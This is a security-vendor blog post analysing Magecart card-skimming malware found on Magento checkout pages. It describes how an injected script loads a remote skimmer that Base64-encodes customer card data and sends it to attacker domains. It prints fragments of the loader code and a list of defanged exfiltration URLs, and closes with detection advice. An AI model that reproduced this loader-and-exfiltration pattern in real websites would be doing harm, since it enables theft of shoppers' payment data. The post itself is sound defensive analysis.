Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Digging Deep Into Magecart Malware

Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he captured during an online retail store checkout session.

This was the HTTP capture:

Untitled-1

At first glance, the GET request is very suspicious. Firstly, the HTTP Referer URL path contains “/checkout/onepage” (a very common URL target path of Magecart attacks). Secondly, the GET request is to a third party domain (mxcounter.com). And thirdly it requests a “.GIF” file followed by a long Base64 encoded string.

So I immediately decoded the Base64 string which resulted in the following :

Decoded_exfil_data

 

Some obvious data exfiltration is going on there!

Next,  I investigated and checked the HTML source code in the checkout page and found this JavaScript at the bottom of the webpage which was not obvious at first:

InjectedJavascript3

 

De-obfuscating the code results in  something like this:

DecodedInjectedJavascript

 

Basically what this script does is:

  1. check if the current page URL location contains the string ‘out/onepag’ (concatenated checkout/onepage)
  2. create a <script> element and points the external script source to 'https://mxcounter.com/click.js?v=1.7'
  3. append the <script> element in the HTML <head>

In short, it injects an external malicious script into the checkout page.

Checking out the JavaScript code from 'https://mxcounter.com/click.js?v=1.7' uncovers a skimming script, as seen in the image below. This script captures personal details and credit card data entered by the merchant’s customer in the checkout page. This details are stored in a JavaScript dictionary with a variable name ‘data’, encoded in  Base64  and sent as a URL parameter to https://mxcounter.com/c.gif?<Base64 encoded data> through a GET tunnel.

Mxcounter1

 

The WHOIS record of mxcounter.com shows that the IP address of the DNS A record is located in Ukraine:

Mxcounter_whoisrecord

There are actually multiple versions of this skimming JavaScript from the same domain, which probably cater to different infected online merchants.

 

For example, here’s version 1.6 of the script:

Mxcounterv1.9

 

and version 1.8:

Mxcounterv1.8

 

and version 2.0, so on and so forth

Mxcounter2.0

 

So with all this in mind, I was curious to find other websites that had similar infections. I first tried Googling the URL “mxcounter.com”, but it didn’t really show me interesting results. I really wanted to search for websites for a string in the HTML code. I stumbled across this website called nerdydata.com which has a capability to do that:

The search result returned one website:

Nerdydata_mxcounter

 

And sure enough, that website in the search result is infected:

Infectedwebsite_searchresult

Mxcounter2.34

 

So I tried a different search string and I searched for a string from the JavaScript code itself:

var img = document.createElement('script')

And there, it returned over 40 websites. I checked each of these websites and half of them were infected with Magecart malware scripts

46website infected

 

I also checked most of the exfiltration/skimming URLs, but some of them are already down at the time of this writing. All of the injected source scripts in the infected webpages are encoded in Base64, which use the JavaScript method atob() to decode it. For example:

img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")

the string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is Base64 encoding of http://mxcounter.com.

One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.

Take, for example, this infected retail webpage  injected by  a malicious JavaScript hosted at an external host:

Mj1

 

That Base64 encoded string is actually the link to the malicious external script source:

Totally

Yet, when visiting that URL link directly, you will get a “503 Service Unavailable” HTTP error.

Totally2

 

However, when you specify the correct HTTP header, User-Agent, Referer and Host, only then will return a malicious JavaScript. Here we used Postman to request the same website:

Postman

 

This code is still obfuscated, however, de-obfuscating the code reveals it is the typical checkout page skimming routine with exfiltration of data to the attacker’s host.

There are probably numerous other infected websites out there but here are the exfiltration/skimming JavaScript URLs I compiled during the investigation:

https://adsapigate[.]com/api.js?v=2.6
https://adsapigate[.]com/api.js?v=3.5
https://apitstatus[.]com/api.js?v=2.1.5
https://billgetstatus[.]com/api.js?v=1.6
https://clickdeskstats[.]com/cd.js
https://cloudodesc[.]com/gtm.js?v=1.3
https://cloudodesc[.]com/gtm.js?v=2.1
https://cloudodesc[.]com/gtm.js?v=2.94
https://gtmproc[.]com/gtm.js?v=1.5
https://livecheckpay[.]com/api.js?v=2.3
https://mxcounter[.]com/click.js?v=1.7
https://newrelicnet[.]com/api.js?v=1.2
https://newrelicnet[.]com/api.js?v=1.4
https://newrelicnet[.]com/api.js?v=4.5
https://nr-public[.]com/api.js?v=2.6
https://nr-public[.]com/api.js?v=2.8
https://ordercheckpays[.]com/api.js?v=2.29
https://ordercheckpays[.]com/api.js?v=3.3
https://reactjsapi[.]com/api.js?v=4.2.0
https://tagsmediaget[.]com/api.js?v=1.1.5
https://tagstracking[.]com/tag.js?v=2.1.2
https://tagstracking[.]com/tag.js?v=2.1.4
https://tagstracking[.]com/tag.js?v=2.1.8
https://tagstracking[.]com/tag.js?v=2.2.2
https://tagstracking[.]com/tag.js?v=2.2.4
https://tagstracking[.]com/tag.js?v=2.2.6
https://trust-tracker[.]com/tagtech.js

Most of the infected websites appear to be running old versions of Magento framework, and exploitation of vulnerabilities in Magento is the most likely cause of the infection, but it is hard to know for sure without conducting further internal investigations. Other possibilities are admin panel brute-force attack or spear-phishing attacks.

So, if you administer or own an e-commerce website running Magento platform, you may want to scan your checkout pages fora possible compromise. You can scan for Javascript code like CreateElement() method i.e. "var img = document.createElement('script')" then you can check if there are Base64 encoded strings that follow after that or the use of a JavaScript method atob(). You can decode the strings with Base64 tools such as tools like CyberChef (https://gchq.github.io/CyberChef/). This Base64 string is usually a URL. You should be able to decide if this URL is something you expect or suspect. 

 

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo